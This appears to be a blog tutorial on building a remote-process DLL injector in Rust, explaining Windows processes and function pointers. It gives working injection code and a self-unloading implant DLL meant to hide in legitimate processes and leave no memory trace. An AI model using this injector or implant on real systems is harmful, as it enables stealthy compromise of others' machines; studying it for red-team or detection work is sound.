Remote process DLL injection in Rust

You can't see me if I'm over there hiding inside the sofa.


Intro

This is going to be a meaty post, so strap in. We need two projects: the first is the DLL we built last time (we make some updates to it at the very end of this blog post), and the second is a new project, where we will be injecting a DLL into a remote process with Rust.

Links:

  1. GitHub - Simple rust DLL
  2. GitHub - The remote process DLL injector

We are going to cover some ground on Windows Processes, Threads, Handles, and perhaps most importantly, function pointers. We will be using function pointers several times with this remote process DLL Injector, so hopefully this post will help you to understand what they are!

If you are new to malware development in Rust, check out my first blog post in this series here.

A legal disclaimer applies, and by reading on you acknowledge it; see the legal disclaimer here. In short, you must not use the below information for any criminal or unethical purposes, and it should only be used by security professionals, or by those interested in cyber security who want to deepen their knowledge. I firmly believe taking a proactive approach to security through penetration testing, ethical hacking and red teaming is one of the best ways we can improve cyber security as a whole in society.

Theory: What is Process Injection

Process injection (T1055) is the practice of injecting code into other processes in order to evade detection and to aid in privilege escalation. There are a number of ways to achieve process injection, but by far one of the most popular is DLL injection, aka T1055.001. DLL injection is simply the practice of injecting a DLL into a running process.

If you think about it, if your implant is called malware.exe, and somebody looks in the Windows task manager and sees malware.exe, they’re gonna be pretty damn suspicious. Imagine if instead of running malware.exe as a constant process, your malware can hide inside of notepad, or within Windows explorer, or any of the hundreds of other legitimate windows processes, running on your computer right now! Well, buckle up as that’s exactly what we are going to do now!

We will explore why this technique works below. However, it is inherently easy for EDR (endpoint detection and response, basically an antivirus on steroids) to detect. In fact, bog standard Windows Defender will also likely detect this technique.

Without doing a deep dive on EDR here, detection works mostly for two reasons: 1) The EDR/AV will statically check your binary. When it does this it looks at which functions the binary calls; in our case we are going to use Win32 API functions which are inherently suspicious, especially when called one after the other. There is very little legitimate reason to do DLL / process injection into a remote process in day to day computing. 2) Any dynamic analysis performed by the EDR/AV will likely confirm this and associate a risk score with the activity.

If you are interested in this technique but using EDR evasion, check my blog post here.

Theory: Processes and how this works

First off - what is a process? Most people tend to think of a process as the bit of code that runs on the computer, however this isn’t quite accurate. A process is a container for a pool of resources that the program can use while it’s executing. It includes a process ID, at least one thread, a program (the code that executes), and a virtual address space. That virtual address space holds the stack of each thread, which keeps track of the active function calls and local variables, and the heap, which is used for dynamic memory allocation.

Each process requires at least one thread, and a thread is an entity within a process which is scheduled for execution. An easier analogy is: if a process is a factory, a thread is a worker.
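To make the factory and worker analogy concrete, here is a minimal sketch using only the Rust standard library (no Win32 calls). The helper name pids_seen_by_workers is made up for this illustration. It spawns a few threads and shows that every one of them reports the same process ID, because they all live inside the same process.

```rust
use std::process;
use std::thread;

/// Spawn `workers` threads and return the process ID each one observed.
/// (Hypothetical helper, purely for illustration.)
fn pids_seen_by_workers(workers: usize) -> Vec<u32> {
    // Each thread simply asks the OS which process it belongs to.
    let handles: Vec<_> = (0..workers)
        .map(|_| thread::spawn(process::id))
        .collect();

    handles
        .into_iter()
        .map(|h| h.join().expect("worker thread panicked"))
        .collect()
}

fn main() {
    // The process is the factory...
    println!("[+] Process (factory) ID: {}", process::id());

    // ...and every thread is a worker inside that same factory.
    for (i, pid) in pids_seen_by_workers(3).into_iter().enumerate() {
        println!("[+] Worker thread {i} belongs to process {pid}");
    }
}
```

Every line printed by the loop shows the same ID as the first line, which is the point: threads are scheduled individually, but they share the resources of the one process that contains them.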

The program in a process could load additional modules, such as DLLs, at runtime, using APIs such as LoadLibraryA as we did in the first tutorial in this series. What happens here is Windows under the hood loads this library into the memory space of the process; thus increasing the size of the process by the size of the loaded library.

So here’s the key bit, we are going to cause Windows to use the LoadLibraryA function (in a clever way) in another process. How do we get another process to call LoadLibraryA? Well, we will cover that below.

A high level view of the methodology looks like this:

[Image: high level overview of remote process DLL injection in Rust]

In short,

  1. We use OpenProcess (Win32 / Rust) to get a handle to the target process.
  2. We then get a handle to our own “kernel32.dll” in our process with GetModuleHandleA (Win32 / Rust), we do this so that we can then find the address of LoadLibraryA (in the next step)
  3. Now we can get the virtual address of LoadLibraryA from Kernel32.dll. We can do this with the API call GetProcAddress (Win32 / Rust). One important thing to note here, and hopefully it is communicated in the graphic: Windows maps Kernel32.dll at the same base address in every process of the same architecture for as long as the machine stays booted, so the address of LoadLibraryA in my process will be the same as the address of LoadLibraryA in the target process. We will cover this in more detail below in the function pointers section.
  4. Next we use VirtualAllocEx (Win32 / Rust) to allocate memory in the remote process, equal to the size (including the null terminator) of the path to the DLL we want to inject. So, if the DLL is located at "C:\Users\pwned\Downloads\evil.dll\0", the size of the buffer we will be allocating will be equal to the length of that string.
  5. Write the path of the DLL into the buffer in the remote process with WriteProcessMemory (Win32 / Rust)
  6. Finally, we can use CreateRemoteThread (Win32 / Rust) to create a thread in the target process, passing a function pointer to the location of LoadLibraryA, and the path of the DLL as an argument. If you don’t understand what this means, don’t worry, I got you covered in one of the below sections.

This sequence of events is highly recognisable by EDR, there are not a lot of reasons for legitimate executables to be doing all these things one after the other, so keep that in mind.

The code

Alright, set up a new Rust project with cargo and import the Windows API from here as we have done in the previous blog posts (if this is new to you, please go and check them).

For this project, our Cargo.toml file needs the following dependencies:

[dependencies]
windows = { version = "0.54.0", features = ["Win32_System_Threading", "Win32_System_LibraryLoader", "Win32_System_Memory", "Win32_System_Diagnostics_Debug", "Win32_Security"] }

The first thing we want to do is create a function to collect the command line argument passed into the program, which will be the process ID of the process you want to inject into:

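use std::env;
use std::process::exit;

/// Collect the target process ID (PID) from the first command line argument.
fn collect_proc_addr() -> u32 {
    let args: Vec<String> = env::args().collect();

    if args.len() != 2 {
        eprintln!("[-] PID required.");
        exit(1);
    }

    // exit cleanly rather than panicking if the argument is not a number
    match args[1].parse::<u32>() {
        Ok(pid) => pid,
        Err(e) => {
            eprintln!("[-] Invalid PID '{}': {e}", args[1]);
            exit(1);
        }
    }
}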

Then in main, we can call it:

fn main() {
    // COLLECT ARGS
    let pid: u32 = collect_proc_addr();
}
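If you would rather keep the parsing logic separate from the process exit, so that it is easy to test, one option is to return a Result. This is only a sketch: parse_pid and the sample argument lists are hypothetical names and values for this example, not part of the original project.

```rust
/// Parse the PID from an argument list shaped like `env::args()`:
/// element 0 is the program name, element 1 is the PID.
/// (Hypothetical helper for illustration.)
fn parse_pid(args: &[String]) -> Result<u32, String> {
    match args {
        // Exactly two elements: program name and one argument.
        [_, pid] => pid
            .trim()
            .parse::<u32>()
            .map_err(|e| format!("'{pid}' is not a valid PID: {e}")),
        _ => Err("usage: <program> <pid>".to_string()),
    }
}

fn main() {
    // Sample inputs standing in for real command line arguments.
    let samples: [Vec<String>; 3] = [
        vec!["injector".to_string(), "1234".to_string()],
        vec!["injector".to_string(), "notepad".to_string()],
        vec!["injector".to_string()],
    ];

    for args in &samples {
        match parse_pid(args) {
            Ok(pid) => println!("[+] Target PID: {pid}"),
            Err(e) => eprintln!("[-] {e}"),
        }
    }
}
```

In a real program you would pass in env::args().collect::<Vec<String>>() and decide in main whether to exit on the Err case.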

Awesome, now we can focus on doing some cool stuff.

REMEMBER when programming in Rust you will need to have both the Win32 API and the Rust Windows API docs open. I won’t be going through each and every parameter required for the below function calls, only the important ones, so please make sure you read the docs, I have left the links in the above numbered list :).

We need to get a handle to the process we wish to inject into, we can do this with OpenProcess, which will return a handle. Using the docs, we can see that the function definition is:

C:

HANDLE OpenProcess(
  [in] DWORD dwDesiredAccess,
  [in] BOOL  bInheritHandle,
  [in] DWORD dwProcessId
);

and in Rust:

pub unsafe fn OpenProcess<P0>(
    dwdesiredaccess: PROCESS_ACCESS_RIGHTS,
    binherithandle: P0,
    dwprocessid: u32
) -> Result<HANDLE>
where
    P0: IntoParam<BOOL>,

The biggest thing we need to worry about here is what PROCESS_ACCESS_RIGHTS means. Using the Win32 API documentation (here) we can pick the rights we need. To allocate and write memory in the target we need PROCESS_VM_OPERATION and PROCESS_VM_WRITE, which are defined respectively as:

  1. Required to perform an operation on the address space of a process
  2. Required to write to memory in a process using WriteProcessMemory.

The CreateRemoteThread documentation additionally states that the handle must have the PROCESS_CREATE_THREAD, PROCESS_QUERY_INFORMATION and PROCESS_VM_READ access rights, so we request those too.

So, in our code this looks like:

// GET HANDLE TO PID
let h_process = unsafe {
    OpenProcess(
        PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE,
        false,
        pid,
    )
};
let h_process = match h_process {
    Ok(h) => {
        println!("[+] Got handle to process ID {pid}, handle: {:?}", h);
        h // return the handle
    },
    Err(e) => panic!("[-] Could not get handle to pid {pid}, error: {e}"),
};
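If the | between the access rights looks odd, it helps to know that each right is just a single bit in a 32-bit mask. The sketch below models that with plain u32 constants instead of the windows crate types so it runs anywhere. The numeric values are the ones listed in Microsoft's process access rights documentation, while combine and has_right are hypothetical helper names for this example.

```rust
// Process access right values as documented by Microsoft.
const PROCESS_CREATE_THREAD: u32 = 0x0002;
const PROCESS_VM_OPERATION: u32 = 0x0008;
const PROCESS_VM_READ: u32 = 0x0010;
const PROCESS_VM_WRITE: u32 = 0x0020;
const PROCESS_QUERY_INFORMATION: u32 = 0x0400;

/// OR a list of rights together into one access mask. (Hypothetical helper.)
fn combine(rights: &[u32]) -> u32 {
    rights.iter().fold(0, |mask, right| mask | right)
}

/// Check whether `mask` contains every bit of `right`. (Hypothetical helper.)
fn has_right(mask: u32, right: u32) -> bool {
    mask & right == right
}

fn main() {
    let mask = combine(&[PROCESS_VM_OPERATION, PROCESS_VM_WRITE]);
    println!("[+] Requested access mask: {mask:#06x}");

    // Each flag can be tested independently of the others.
    for (name, right) in [
        ("PROCESS_CREATE_THREAD", PROCESS_CREATE_THREAD),
        ("PROCESS_VM_OPERATION", PROCESS_VM_OPERATION),
        ("PROCESS_VM_READ", PROCESS_VM_READ),
        ("PROCESS_VM_WRITE", PROCESS_VM_WRITE),
        ("PROCESS_QUERY_INFORMATION", PROCESS_QUERY_INFORMATION),
    ] {
        println!("    {name}: {}", has_right(mask, right));
    }
}
```

Because every right occupies its own bit, combining them never loses information, and Windows can check each one individually when you later use the handle.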

Next, to get a handle to Kernel32.dll running in our process, we use GetModuleHandleA, passing in the parameter of "Kernel32.dll" like so:

// GET HANDLE TO KERNEL32 DLL
// so this will get us the handle to K32.dll in our process
let h_kernel32 = unsafe { GetModuleHandleA(s!("Kernel32.dll")) };
let h_kernel32 = match h_kernel32 {
    Ok(h) => {
        println!("[+] Handle to Kernel32.dll: {:?}", h);
        h
    }
    Err(e) => panic!("[-] Could not get handle to Kernel32.dll, {e}"),
};

Now we have the handle to Kernel32.dll, we need to find the virtual address within Kernel32.dll where the exported function LoadLibraryA lives. If function pointers are new to you, we will shortly be exploring those in more detail; for now just push the “I believe” button. When we match on load_library_fn_address, we cast the address as *const () in preparation for a later operation where we will use the transmute function. Again, if this is alien to you, don’t worry.

// GET FUNCTION POINTER TO LOAD LIBRARY
let load_library_fn_address = unsafe { GetProcAddress(h_kernel32, s!("LoadLibraryA")) };
let load_library_fn_address = match load_library_fn_address {
    None => panic!("[-] Could not resolve the address of LoadLibraryA."),
    Some(address) => {
        let address = address as *const (); // better cast as per https://doc.rust-lang.org/std/mem/fn.transmute.html
        println!("[+] Address of LoadLibraryA: {:p}", address);
        address
    }
};

Raw pointers in Rust

I’m going to give a quick primer as to what pointers are. For some, especially those starting out, they are a relatively advanced topic, so I would encourage you to go away and explore pointers in more detail.

In programming, variables are stored within a process’s virtual memory, specifically on the stack or the heap. Each time you create a variable, it occupies a unique location in memory and is assigned an address, let’s say 1234. A pointer is simply a variable which, instead of holding a value, holds the address of another variable. Putting this into a scenario, in Rust, you could visualise what’s going on like so:

    let the_answer_to_everything = 42; // an integer
    println!("{}", the_answer_to_everything); // will print 42
    println!("{:p}", &the_answer_to_everything); // will print 0x41ff35f6cc

So, this tells us that the variable, the_answer_to_everything holds the value 42, but the address in memory of where the_answer_to_everything is, is 0x41ff35f6cc. Addresses in binaries and memory are represented in hexadecimal.

Rust has a strong emphasis on “safety”; what does this mean? In C, you can pass around pointers like they are going out of fashion. Imagine having a variable containing data that’s too computationally expensive to duplicate. Instead of passing the actual data into functions, you could pass a pointer to the data’s location, allowing those functions to access and even modify the original data. Convenient right? Rust allows something similar through references (using the ‘&’ operator).

C and C++ are quite permissive with pointers, which can lead to issues. Consider a variable as a placeholder for an address: if the data at that address changes, say it gets deallocated or moved, your pointer still points to a location in memory, but the data it used to point to is no longer valid. You end up with a valid pointer to invalid data.

Rust mitigates this risk with its strict borrowing rules, ensuring references to data are valid and safe to use. But when it comes to low-level system interactions, such as calling Windows API functions or interfacing with drivers, we often need to work with raw pointers. Rust allows us to do this via the unsafe keyword. The unsafe block allows us to work directly with pointers, and acts as a visual aid to the programmer that you are entering territory which could lead to memory exceptions and vulnerabilities.

In Rust, there are two kinds of raw pointer. Respectively, the below are an immutable pointer and a mutable pointer:

*const T // an IMMUTABLE pointer does not allow direct modification of the value it points to
*mut T // so if you want to change its data, you need a MUTABLE pointer

In the below section, you will see we are using a pointer of:

as *const c_void

So hopefully you recognise the pattern in the syntax.

Let’s provide a quick example of using raw pointers in Rust. In the below example we assign 42 to a mutable variable. Then we create two raw pointers to it, one as a constant pointer, and the other as a mutable pointer. Note the type T in the pointer syntax, in our case i32. Then we print the pointer, and we can see the location in memory where our variable lives, AKA where the pointer points to. When we dereference it with the dereference operator *, we get the value at that memory location, which is 42.

We then use unsafe to change the value of the data at that pointer location to 99, then when we print it out again, the variable is still pointing to the same region of memory (a 32-bit integer (i32) memory location), but the value of the data at that location has now changed, to 99.

fn main() {
    let mut my_int = 42; // declare a mutable integer variable initialized to 42

    // create a mutable raw pointer to the integer, then derive a constant raw pointer from it.
    // deriving r1 from r2 (rather than from a separate `&my_int`) keeps both pointers valid
    // under Rust's aliasing rules.
    let r2 = &mut my_int as *mut i32; // can be used to modify the value it points to
    let r1 = r2 as *const i32; // raw pointer to an i32, cannot directly modify the value it points to

    // unsafe block needed to dereference raw pointers
    unsafe {
        // prints something like: Before change - r1 points to: 0x16b98aecc, dereferenced value: 42
        println!("Before change - r1 points to: {:?}, dereferenced value: {}", r1, *r1);
    }

    // change the value at the memory location of my_int (as r2 is a pointer to that memory location)
    unsafe { *r2 = 99; }

    unsafe {
        // prints the same address as before, but the dereferenced value is now 99
        println!("After change - r1 still points to: {:?}, dereferenced value: {}", r1, *r1);
    }
}

Back to our code

So now we need to allocate memory within the target process for a buffer the length of the path of our DLL. This isn’t the length of the DLL (we aren’t stuffing the binary blob of the DLL into the target process, just the path to the DLL). Once we have successfully allocated the memory, we can then write the string into the allocated memory. To do this we will be using the Win32 API functions VirtualAllocEx and WriteProcessMemory.

A few notes, firstly in the VirtualAllocEx documentation, the function definition is:

LPVOID VirtualAllocEx(
  [in]           HANDLE hProcess,
  [in, optional] LPVOID lpAddress,
  [in]           SIZE_T dwSize,
  [in]           DWORD  flAllocationType,
  [in]           DWORD  flProtect
);

This is looking for a handle to the target process (we have that thanks to OpenProcess). lpAddress is a pointer to a desired starting address for the region of pages we wish to allocate, this is optional and we don’t want to use this feature. dwSize is the size of the region of memory we wish to allocate (AKA the length of the string which houses the path to the DLL). flAllocationType is the type of memory allocation, in our case we want: MEM_COMMIT and MEM_RESERVE. Finally flProtect we can set to PAGE_EXECUTE_READWRITE, which gives execute, read-only, or read/write access to the committed region of pages.

A note on WriteProcessMemory: the definition requires a pointer to the data that we are going to write into the buffer. The way to write an LPCVOID in Rust is path_to_dll.as_ptr() as *const c_void. A void pointer is basically a pointer to ‘anything’; this is C being loosey-goosey about types.

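// ALLOCATE MEMORY FOR THE DLL PATH
// the trailing \0 is the null terminator LoadLibraryA expects; including it in the
// string means size_of_val counts it too
let path_to_dll = "C:\\path\\to\\dll\\rust_dll.dll\0";

let remote_buffer_base_address = unsafe {
    VirtualAllocEx(
        h_process,
        None,
        size_of_val(path_to_dll),
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE,
    )
};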

if remote_buffer_base_address.is_null() {
    panic!("[-] Failed allocating memory into remote process for DLL Path");
}

println!("[+] Remote buffer base address: {:p}", remote_buffer_base_address);

// Write to the buffer
let mut bytes_written: usize = 0;
let buff_result = unsafe {
    WriteProcessMemory(h_process, remote_buffer_base_address, path_to_dll.as_ptr() as *const c_void, size_of_val(path_to_dll), Some(&mut bytes_written as *mut usize))
};

match buff_result {
    Ok(_) => println!("[+] Bytes written to remote process: {:?}", bytes_written),
    Err(e) => panic!("[-] Error writing remote process memory: {e}"),
}
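The buffer size and the void pointer cast are easy to get subtly wrong, so here is a small local sketch that involves no remote process at all. It uses CString from the standard library to show that a C-style string needs one more byte than the Rust string (the null terminator), and that casting to *const c_void only erases the type while the bytes behind the pointer stay the same. The helper c_buffer_len is a hypothetical name for this example, and the path is the same placeholder used above.

```rust
use std::ffi::{c_char, c_void, CStr, CString};

/// Number of bytes a C API must receive for `path`, null terminator included.
/// (Hypothetical helper for illustration.)
fn c_buffer_len(path: &str) -> usize {
    CString::new(path)
        .expect("path must not contain interior NUL bytes")
        .as_bytes_with_nul()
        .len()
}

fn main() {
    let path = "C:\\path\\to\\dll\\rust_dll.dll"; // placeholder path
    let c_path = CString::new(path).expect("path must not contain interior NUL bytes");

    // A Rust &str carries its own length and has no terminator...
    println!("Rust str length: {}", path.len());
    // ...whereas the C representation is one byte longer.
    println!("C buffer length: {}", c_buffer_len(path));

    // Erase the type, as you would when an API asks for an LPCVOID.
    let untyped: *const c_void = c_path.as_ptr() as *const c_void;

    // Restore the type and read the string back. This is sound here because
    // `c_path` is still alive and is guaranteed to be null terminated.
    let round_trip = unsafe { CStr::from_ptr(untyped as *const c_char) };
    assert_eq!(round_trip.to_str().unwrap(), path);
    println!("Round trip OK: {:?}", round_trip);
}
```

The design point is that the length you allocate and the length you write should both come from the terminated form of the string, so that the function reading it later knows where the string ends.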

Function pointers

Now we have a rough idea what a pointer is (from the above section), let’s introduce the function pointer:

A function pointer is just that, a pointer to a function. Instead of the pointer pointing to a variable, the function pointer will point to the memory location of the entry point to a function. Imagine you have a street of businesses, each business will do something for you, and give you something back. At the start of the street you are given a map which has the address of each business on; now you can go directly to that business and exchange your goods.

Putting this into a code example, Rust has a particular way of making you define a function pointer:

// A function named 'add'
fn add(a: i32, b: i32) -> i32 {
    a + b
}

fn main() {
    // Declare a function pointer named `operation` and point it at the `add` function
    let operation: fn(i32, i32) -> i32 = add;

    // Now you can use `operation` to call the `add` function
    let result = operation(2, 3);
    println!("The result is: {}", result); // Will print 5
    // Will print the address of the function, for example 0x7ff713b413d0
    println!("Add location: {:p}", operation as *const ());
}

The variable operation can hold a pointer to any function that takes two i32 values and returns an i32. In this code, we have pointed it at the function add, meaning calling operation(2, 3) is the same as calling add(2, 3).

The below graphic shows virtual addresses next to each function, so if you wanted to call one of these functions, you could do so by getting the address of the function, then calling that.

[Image: functions shown alongside their virtual addresses]

Back to our remote DLL injection, we are using the API function CreateRemoteThread in order to create a thread in another process. This function expects an input parameter called lpStartAddress, which is a pointer to the function the new thread will execute. In our case, we want to point to the function LoadLibraryA which is found in Kernel32.dll (which itself is loaded into every Windows process).

In the above code, we have already got the address of LoadLibraryA, however to use this address we need to correctly cast it to the type LPTHREAD_START_ROUTINE. The Rust Windows API tells us that this type signature is:

pub type LPTHREAD_START_ROUTINE = Option<unsafe extern "system" fn(lpthreadparameter: *mut c_void) -> u32>;

Whilst this might make you want to quit Rust forever, it’s not as complicated as it first looks. This simply tells us that the type is a pointer to an unsafe function using the "system" calling convention (the one the Win32 API uses), which takes one argument, a *mut c_void, and returns a u32, all wrapped in the Option enum. The *mut c_void is a raw pointer to any type of data (the equivalent of void* in C).

As we have a pointer to LoadLibraryA, we can cast this using std::mem::transmute. In the first example in the Rust documentation, it explains how transmute can be used to turn a pointer into a function pointer, which is what we are doing here. And this is how we can do it:

let load_library_fn_address: Option<unsafe extern "system" fn(*mut c_void) -> u32> = Some(
    unsafe { std::mem::transmute(load_library_fn_address) }
);
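To see the cast in isolation, here is a local sketch of the same round trip: a function's address is erased to *const (), turned back into a typed function pointer with transmute, and then called. Everything runs inside one process. ThreadStart is a local alias with the same shape as the function type inside LPTHREAD_START_ROUTINE, and double_it and call_through_raw_address are hypothetical names standing in for a real thread routine.

```rust
use std::ffi::c_void;
use std::mem::transmute;

/// Same shape as the function type wrapped by LPTHREAD_START_ROUTINE.
type ThreadStart = unsafe extern "system" fn(*mut c_void) -> u32;

/// Hypothetical routine: treats its parameter as a pointer to a u32 and doubles it.
unsafe extern "system" fn double_it(param: *mut c_void) -> u32 {
    let value = unsafe { *(param as *const u32) };
    value.wrapping_mul(2)
}

/// Erase the function's type down to a raw address, restore it, then call it.
fn call_through_raw_address(input: u32) -> u32 {
    let mut input = input;

    // Erase: all we keep is an address, much like the value GetProcAddress hands back.
    let raw: *const () = double_it as ThreadStart as *const ();

    // Restore: tell the compiler what kind of function lives at that address.
    // This is only sound because `raw` really does point at a function with this signature.
    let restored: ThreadStart = unsafe { transmute::<*const (), ThreadStart>(raw) };

    // Call it, passing a type-erased pointer to our argument.
    unsafe { restored(&mut input as *mut u32 as *mut c_void) }
}

fn main() {
    println!("Address of double_it: {:p}", double_it as ThreadStart as *const ());
    println!("Result: {}", call_through_raw_address(21));
}
```

The compiler cannot check that the address and the signature match, which is exactly why transmute is unsafe: getting the signature wrong is undefined behaviour rather than a compile error.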

So now we have a correctly typed function pointer to LoadLibraryA. The function CreateRemoteThread also requires another pointer as the next argument, and this is a pointer to an argument to be passed into LoadLibraryA. Well, looking at the documentation, LoadLibraryA takes in a PCSTR (a pointer to a string), and this is the path to the DLL (or EXE) we wish to inject.

There is one final thing to explain before showing the last bit of code, and hopefully it is a question you are asking yourself as you read along. We have the address of LoadLibraryA in our process; surely we need the address of LoadLibraryA in the remote process? Yes, we do. However, this DLL injection technique takes advantage of one really cool feature of Windows: Kernel32.dll is mapped at the same base address in every process of the same architecture for as long as the machine stays booted. The base address of Kernel32.dll in the local process is therefore the same as in the remote process, so the address we resolved for LoadLibraryA (which is exported by Kernel32.dll) is valid in the target process too. That address is not permanent, though: ASLR picks a new base address for system DLLs at each boot, and the offset of LoadLibraryA inside the DLL can change between builds of Windows, so hardcoding it would be ill-advised.

If the above gave you a minor brain injury, don’t worry. It did the same to me first time ‘round. Go for a walk, and come back to it with a fresh head.

So, the code for the final part looks like this:

    // correctly cast the address of LoadLibraryA
    let load_library_fn_address: Option<unsafe extern "system" fn(*mut c_void) -> u32> = Some(
        unsafe { std::mem::transmute(load_library_fn_address) }
    );

    let mut thread: u32 = 0;

    // create thread
    let h_thread = unsafe { CreateRemoteThread(
        h_process,
        None, // default security descriptor
        0, // default stack size
        load_library_fn_address, // function pointer to LoadLibraryA
        Some(remote_buffer_base_address), // pointer to param to pass into LoadLibraryA
        0,
        Some(&mut thread as *mut u32), // pass by reference a u32 to store the thread id
    )};

    match h_thread {
        Ok(h) => println!("[+] Thread started, handle: {:?}", h),
        Err(e) => panic!("[-] Error occurred creating thread: {e}"),
    }

You can find the full project here on my GitHub.

A DLL update: automatic unloading

If you have followed along with my previous tutorial on this blog, making a DLL in Rust (or on my YouTube video here), then there is one thing we need to quickly amend; we want the DLL to unload itself once it has finished its work. To do this, we are going to add a helper, spawn_thread, and a new thread entry point, unload_dll. The helper will be called when the implant (AKA the DLL) has finished whatever it was there to do. To clean up after itself, it’s going to spawn a new thread, and in that thread unload_dll calls FreeLibraryAndExitThread, taking a handle to the module (AKA the DLL) as a parameter, thus freeing the library.

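Due to the way Windows loads libraries (for example how here we will use LoadLibraryA in the remote process), loading a module that is already loaded does not load it a second time: Windows just increments the module’s reference count, and DllMain is not called again with DLL_PROCESS_ATTACH. To run the DLL again you first need to unload it with the FreeLibrary Win32 API call (or FreeLibraryAndExitThread), then load the library again.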

When a DLL is loaded or unloaded, Windows employs a Loader Lock to synchronise some operations, preventing multiple threads from simultaneously performing actions that could lead to race conditions or inconsistencies within the process’s memory space. This however, introduces risks of deadlocks and buggy code.

To mitigate this, we now launch the main DLL functionality from a new thread, which sidesteps potential deadlocks by avoiding direct operations within DllMain that could invoke the Loader Lock.

We introduce an enum to determine which function (the attach function, or the function to unload the library) is passed into CreateThread as a function pointer.

To ensure the module is cleaned up properly, we can spawn a new thread to call FreeLibrary, removing the library from the process.
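The enum-to-function-pointer idea can be tried out without any Windows APIs. The sketch below uses std::thread in place of CreateThread, and Task, start_work, clean_up, entry_point and run_on_new_thread are all hypothetical names chosen for this illustration. It maps each enum variant to a function pointer and runs the chosen function on a fresh thread.

```rust
use std::thread;

/// Which routine the new thread should run. (Hypothetical, mirrors the idea of LoadModule.)
#[derive(Clone, Copy, Debug, PartialEq)]
enum Task {
    StartWork,
    CleanUp,
}

fn start_work() -> &'static str {
    "work started"
}

fn clean_up() -> &'static str {
    "cleaned up"
}

/// Map an enum variant to the function pointer the new thread will start at.
fn entry_point(task: Task) -> fn() -> &'static str {
    match task {
        Task::StartWork => start_work,
        Task::CleanUp => clean_up,
    }
}

/// Run the selected function on a new thread and wait for its result.
fn run_on_new_thread(task: Task) -> &'static str {
    let entry = entry_point(task);
    thread::spawn(entry).join().expect("worker thread panicked")
}

fn main() {
    for task in [Task::StartWork, Task::CleanUp] {
        println!("{task:?} -> {}", run_on_new_thread(task));
    }
}
```

Keeping the selection in one match means the thread-spawning code does not need to know which routine it is launching; it only ever sees a function pointer.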

The refactored DLL looks like so:

use std::ffi::c_void;
use windows::{Win32::UI::WindowsAndMessaging::{MessageBoxA, MB_OK}, Win32::System::SystemServices::*,};
use windows::core::s;
use windows::Win32::Foundation::HINSTANCE;
use windows::Win32::System::LibraryLoader::FreeLibraryAndExitThread;
use windows::Win32::System::Threading::{CreateThread, LPTHREAD_START_ROUTINE, THREAD_CREATION_FLAGS};

static mut HMODULE_INSTANCE: HINSTANCE = HINSTANCE(0); // handle to the module instance of the injected dll

enum LoadModule {
    FreeLibrary,
    StartImplant,
}

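#[no_mangle]
#[allow(non_snake_case)]
// Windows calls DllMain using the "system" calling convention, so declare it explicitly
extern "system" fn DllMain(hmod_instance: HINSTANCE, dw_reason: u32, _: usize) -> i32 {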
    match dw_reason {
        DLL_PROCESS_ATTACH => unsafe {
            HMODULE_INSTANCE = hmod_instance; // set a handle to the module for a clean unload
            spawn_thread(LoadModule::StartImplant); // start implant in a new thread
        },
        _ => (),
    }

    1
}

/// Entrypoint to the actual implant, to be spawned as a new thread from DLL_PROCESS_ATTACH.
/// This should help to prevent problems whereby the Loader Lock interferes with our implant.
///
/// Think of this as calling a function to start something from main().
#[no_mangle]
unsafe extern "system" fn attach(_lp_thread_param: *mut c_void) -> u32 {
    MessageBoxA(None, s!("Hello from Rust DLL"), s!("Hello from Rust DLL"), MB_OK);

    // implant completed execution, unload the DLL
    spawn_thread(LoadModule::FreeLibrary);

    1
}

/// Spawn a new thread in the current (injected) process, passing CreateThread a function
/// pointer to the function the new thread will run.
fn spawn_thread(lib_to_load: LoadModule) {
    unsafe {
        // function pointer to where the new thread will begin
        let thread_start: LPTHREAD_START_ROUTINE;

        match lib_to_load {
            LoadModule::FreeLibrary => thread_start = Some(unload_dll),
            LoadModule::StartImplant => thread_start = Some(attach)
        }

        // create a thread with a function pointer to the region of the program we want to execute.
        let _thread_handle = CreateThread(
            None,
            0,
            thread_start,
            None,
            THREAD_CREATION_FLAGS(0),
            None,
        );
    }
}

#[no_mangle]
/// Unload the DLL by its handle, so that there is no live evidence of the DLL in memory after it
/// has finished its business. This also allows the same DLL to be loaded into the same process again.
unsafe extern "system" fn unload_dll(_lpthread_param: *mut c_void) -> u32 {
    MessageBoxA(None, s!("Unloading"), s!("Unloading"), MB_OK);
    FreeLibraryAndExitThread(HMODULE_INSTANCE, 1);
}